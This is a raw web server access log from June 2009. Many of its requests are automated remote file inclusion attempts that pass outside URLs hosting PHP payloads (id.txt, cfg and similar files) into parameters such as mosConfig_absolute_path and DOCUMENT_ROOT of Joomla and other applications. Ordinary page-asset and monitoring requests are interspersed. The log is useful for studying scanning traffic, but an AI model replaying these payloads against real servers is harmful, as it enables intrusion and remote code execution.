216.139.67.116 - - [24/Jun/2009:07:57:36 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 200 6778 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:07:57:36 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
207.210.111.216 - - [24/Jun/2009:07:57:43 -0400] "GET //aMember/plugins/payment/cdg/cdg.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
219.118.79.178 - - [24/Jun/2009:07:58:07 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
219.118.79.178 - - [24/Jun/2009:07:58:08 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
219.118.79.178 - - [24/Jun/2009:07:58:08 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
38.99.44.103 - - [24/Jun/2009:07:58:10 -0400] "GET /images/_notes/nav_store_hist_grn.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
83.16.182.130 - - [24/Jun/2009:07:58:23 -0400] "GET /logs/access_log.Q109051900//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:58:24 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:58:24 -0400] "GET /?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.98.209.71 - - [24/Jun/2009:07:58:24 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 6778 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
216.139.67.116 - - [24/Jun/2009:07:58:40 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:07:58:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
98.213.33.52 - - [24/Jun/2009:07:58:36 -0400] "GET http://www.aceonlinestore.com/logs/access_log.Q109051400 HTTP/1.0" 200 6017281 "http://search.yahoo.com/search?p=67.69.254.244:80+proxy+OR+proxies+OR+socks5+OR+http+OR+socks4+\"2009\"&adult_done=http%3A%2F%2Fyq.search.yahoo.com%2Fsearch&adult_cancel=http%3A%2F%2Fyq.search.yahoo.com%2Fweb%2Fadvanced&_adv_prop=web&ei=UTF-8&vst=0&vf=all&vm=i&fl=0&n=100&fr=yq-gen&_bcrumb=d88857c746a7a3da8fe6bbba455d2991%2C1240350925" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"
83.98.209.71 - - [24/Jun/2009:07:59:00 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:59:00 -0400] "GET /?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 409 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
83.98.209.71 - - [24/Jun/2009:07:59:00 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 200 6778 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
172.16.1.88 - - [24/Jun/2009:07:59:09 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [24/Jun/2009:07:59:09 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [24/Jun/2009:07:59:09 -0400] "PROPFIND /CA400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [24/Jun/2009:07:59:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [24/Jun/2009:07:59:10 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.88 - - [24/Jun/2009:07:59:13 -0400] "PROPFIND /QIbm HTTP/1.1" 405 230 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
69.94.125.100 - - [24/Jun/2009:07:59:46 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:59:46 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:59:46 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:07:59:51 -0400] "GET /logs/access_log.Q109061200%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [24/Jun/2009:07:59:51 -0400] "GET /logs/error_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
216.139.67.116 - - [24/Jun/2009:07:59:57 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 225 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.139.67.116 - - [24/Jun/2009:07:59:57 -0400] "GET /?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 200 409 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.139.67.116 - - [24/Jun/2009:08:00:02 -0400] "GET /?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:08:00:02 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 200 6778 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:08:00:03 -0400] "GET /logs/access_log.Q109060400/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.139.67.116 - - [24/Jun/2009:08:00:05 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 200 6778 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.139.67.116 - - [24/Jun/2009:08:00:11 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
219.94.194.231 - - [24/Jun/2009:08:00:14 -0400] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
219.94.194.231 - - [24/Jun/2009:08:00:15 -0400] "GET /logs/access_log.Q109051500/bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
219.94.194.231 - - [24/Jun/2009:08:00:15 -0400] "GET /logs/access_log.Q109060400/bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
219.94.194.231 - - [24/Jun/2009:08:00:15 -0400] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
74.53.70.114 - - [24/Jun/2009:08:00:22 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.53.70.114 - - [24/Jun/2009:08:00:26 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
202.21.134.11 - - [24/Jun/2009:08:00:22 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127 HTTP/1.1" 200 45236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
80.93.53.109 - - [24/Jun/2009:08:00:31 -0400] "GET /logs/access_log.Q109060400%20%20/?DOCUMENT_ROOT=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.21.134.11 - - [24/Jun/2009:08:00:31 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:32 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:32 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:33 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:33 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:34 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:34 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:35 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:35 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:35 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:36 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:36 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:37 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:38 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:38 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:38 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:38 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:39 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:39 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:40 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:40 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:40 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
202.21.134.11 - - [24/Jun/2009:08:00:40 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):9435127" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ; .NET CLR 1.0.3705)"
83.98.209.71 - - [24/Jun/2009:08:00:43 -0400] "GET /logs/error_log.Q109060400/?DOCUMENT_ROOT=http://www.look22.de/cfg?? HTTP/1.1" 404 224 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
69.94.125.100 - - [24/Jun/2009:08:00:49 -0400] "GET /logs/access_log.Q109061400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:08:00:49 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:08:01:03 -0400] "GET /images/_notes/nav_store_fav_blue.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
172.16.1.168 - - [24/Jun/2009:08:01:16 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:01:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.168 - - [24/Jun/2009:08:01:16 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
118.101.3.94 - - [24/Jun/2009:08:01:30 -0400] "GET ///skin/zero_vote/error.php?dir=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
118.101.3.94 - - [24/Jun/2009:08:01:30 -0400] "GET /logs///skin/zero_vote/error.php?dir=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.101.3.94 - - [24/Jun/2009:08:01:30 -0400] "GET /logs/access_log.Q109051500///skin/zero_vote/error.php?dir=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.101.3.94 - - [24/Jun/2009:08:01:38 -0400] "GET /logs/access_log.Q109051200///skin/zero_vote/error.php?dir=http://www.katrinkurven.dk//plugins/search/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.17.99.13 - - [24/Jun/2009:08:01:55 -0400] "GET /logs/access_log.Q109061800//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:01:55 -0400] "GET /logs/access_log.Q109061800//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:01:55 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:01:55 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:01:55 -0400] "GET /logs//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:01:55 -0400] "GET /logs//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:01:58 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:01:58 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:01:58 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:01:58 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:01:59 -0400] "GET /logs/access_log.Q109061500//index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.17.99.13 - - [24/Jun/2009:08:02:00 -0400] "GET //index.php?option=com_moofaq&Itemid=&mosConfig_absolute_path=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [24/Jun/2009:08:02:00 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
